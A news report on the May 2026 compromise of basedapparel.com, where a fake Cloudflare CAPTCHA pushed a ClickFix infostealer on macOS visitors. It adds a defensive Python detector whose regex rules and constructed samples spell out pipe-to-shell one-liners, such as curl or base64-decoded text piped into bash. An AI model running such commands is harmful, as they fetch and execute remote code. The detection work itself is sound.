May 23, 2026 — Based Apparel, a merchandise store linked to FBI Director Kash Patel, was compromised and served a ClickFix infostealer to macOS visitors for an unknown period before the site went dark on Friday. The attack targeted crypto wallets, browser session tokens, and login credentials — the standard payload of a class of macOS campaigns that security researchers have flagged as a primary initial access vector throughout 2026.
The incident was first flagged on X on May 22 by a user who visited basedapparel.com after an Atlantic article linked to the site. PCMag then reproduced and confirmed the report, verifying that the malicious prompt was live. Decrypt and SC Media subsequently reported the site offline by Friday morning, showing a message that the store would return "bolder than ever."
What visitors saw
macOS visitors were met with a fake Cloudflare CAPTCHA screen — a standard lure in the ClickFix playbook. The page instructed users to complete a "human verification" step by copying a command and pasting it into their Mac's Terminal application. The command was an obfuscated payload designed to execute silently and harvest data already on the machine: crypto wallet files, browser session tokens, and stored credentials.
The MetaMask browser wallet flagged basedapparel.com as "potentially deceptive," surfacing a warning about "malicious transactions resulting in stolen assets" for any MetaMask user who navigated to the site, per Decrypt.
The number of visitors exposed is not publicly known. Web analytics provider Ahrefs estimated the site receives approximately 33,600 visits per month, per Decrypt — though that figure covers normal traffic and says nothing about how long the malicious version was live before it was reported.
How ClickFix works
ClickFix is a social engineering technique, not a software exploit. It requires no browser vulnerability or zero-day. The attacker compromises a legitimate website and injects a page that mimics a trusted checkpoint — most commonly a Cloudflare CAPTCHA or a system error dialog. The page tells the visitor something needs to be "fixed" to proceed, and provides a command to copy.
On macOS, the target is Terminal. The user pastes and runs the command themselves. Because the command is entered into a shell and executes with the user's own privileges, rather than arriving as a downloaded application that the user opens, macOS's Gatekeeper — its primary defense against unsigned software — does not trigger. The payload lands as if the user installed it intentionally.
Recorded Future's Insikt Group has documented five distinct ClickFix infrastructure clusters actively operating in 2025 and 2026, covering both Windows (via the Run dialog) and macOS (via Terminal). Their assessment: ClickFix "will very likely remain a primary initial access vector throughout 2026." A Microsoft Security blog post from May 6, 2026 documented a parallel ClickFix campaign using fake macOS utility lures to deliver infostealers — confirming the technique is in active, broad deployment.
Security researchers have also documented variants that bypass Terminal entirely: Jamf Threat Labs reported a ClickFix variant that uses macOS's Script Editor instead, triggered through the applescript:// URL scheme. The Based Apparel compromise used the Terminal variant — the earlier and more prevalent form.
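For defenders, the Terminal variant described above leaves a recognizable shape in process telemetry: an interactive terminal spawning a one-liner that feeds downloaded or decoded text straight into an interpreter. The sketch below is an added example, not code from any of the cited reports; the event fields (parent, cmdline), the rule names and the patterns are assumptions for illustration, and the sample events are constructed.

```python
import re

# Rule names and patterns are illustrative assumptions, not indicators
# published for this incident. They describe the shape of a pasted one-liner.
INTERP = r"(?:sh|bash|zsh|osascript|python3?)"
RULES = [
    # curl/wget output piped directly into an interpreter
    ("download-piped-to-interpreter",
     re.compile(rf"\b(?:curl|wget)\b[^|;]*\|\s*(?:sudo\s+)?{INTERP}\b")),
    # an encoded blob decoded and piped into an interpreter (the obfuscated form)
    ("base64-decoded-into-interpreter",
     re.compile(rf"\bbase64\s+(?:-d|-D|--decode)\b[^|;]*\|\s*{INTERP}\b")),
    # interpreter -c "$(curl ...)": download via command substitution
    ("interpreter-runs-substituted-download",
     re.compile(rf"\b{INTERP}\s+-c\s+[\"']?\$\((?:curl|wget)\b")),
]
# A terminal emulator as parent suggests a human pasted the command.
INTERACTIVE_PARENTS = {"Terminal", "iTerm2"}

def classify(event):
    """Return (verdict, matched rule names) for one process event."""
    hits = [name for name, rx in RULES if rx.search(event["cmdline"])]
    if not hits:
        return "ok", hits
    verdict = "alert" if event["parent"] in INTERACTIVE_PARENTS else "review"
    return verdict, hits

def scan(events):
    """Return (cmdline, verdict, hits) for every event that matched a rule."""
    results = ((e["cmdline"], *classify(e)) for e in events)
    return [r for r in results if r[1] != "ok"]

# Constructed telemetry for the example; hosts and blobs are placeholders.
SAMPLE_EVENTS = [
    {"parent": "Terminal", "cmdline": "echo <BASE64_BLOB> | base64 -D | bash"},
    {"parent": "Terminal", "cmdline": "curl -fsSL https://example.invalid/verify | sh"},
    {"parent": "launchd", "cmdline": "curl -fsSL https://example.invalid/agent.sh | bash"},
    {"parent": "Terminal", "cmdline": "curl -O https://example.invalid/report.pdf"},
]

if __name__ == "__main__":
    for cmdline, verdict, hits in scan(SAMPLE_EVENTS):
        print(f"{verdict:6} {','.join(hits):36} {cmdline}")
```

Legitimate installer one-liners typed into Terminal have the same shape, so an alert here is a triage signal to weigh against the destination host, not a verdict.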
Attribution and context
Based Apparel is owned by Kash Patel and Andrew Ollis, who also serves as CEO of the Kash Foundation, per The Guardian. The Kash Foundation — a nonprofit Patel founded — linked to the apparel site through one of its primary navigation menus. The foundation's site states Patel is no longer affiliated with the organization in any capacity and that the foundation has no government affiliation.
The attack is a third-party compromise. Nothing in the reported evidence indicates the site was set up to serve malware intentionally. The incident is consistent with the standard profile of a ClickFix campaign: actors scan for vulnerable e-commerce sites, inject the fake CAPTCHA page, and let traffic do the rest.
This is not Patel's first proximity to crypto-adjacent security incidents. After Iranian hackers leaked his personal email and a burner username, a wave of Patel-themed meme coins followed on Pump.fun, per Decrypt.
What this illustrates
The Based Apparel case is structurally unremarkable as a ClickFix incident — a legitimate site compromised, a fake CAPTCHA injected, macOS users prompted into running a hostile Terminal command. What makes it visible is the principal: the director of the FBI, an agency that in March 2026 was investigating ClickFix-style malware deployed through Steam games, had his merchandise site running the same category of attack.
The deeper pattern is supply-chain exposure at the traffic level. Users arrived at basedapparel.com through a credible referral — a link in an Atlantic article. The site had legitimate historical traffic. Neither indicator triggered suspicion. ClickFix works precisely because it does not rely on software exploitation; it relies on the user's trust in the page they are already on.
Crypto wallet users have a specific exposure here. ClickFix infostealers routinely target wallet seed phrases stored in browser extensions and application files, session tokens that can allow account takeover without a password, and any credentials cached by the browser. MetaMask's flagging of the domain as potentially deceptive was functional protection for users who had the extension installed — but only for MetaMask. Other wallet software and browser-stored credentials had no equivalent warning.
The site was offline as of Friday morning, May 23, 2026.
Sources: PCMag · Decrypt · SC Media · Recorded Future / Insikt Group · Microsoft Security Blog · Jamf Threat Labs · Original X report by @dm4uz3 · The Guardian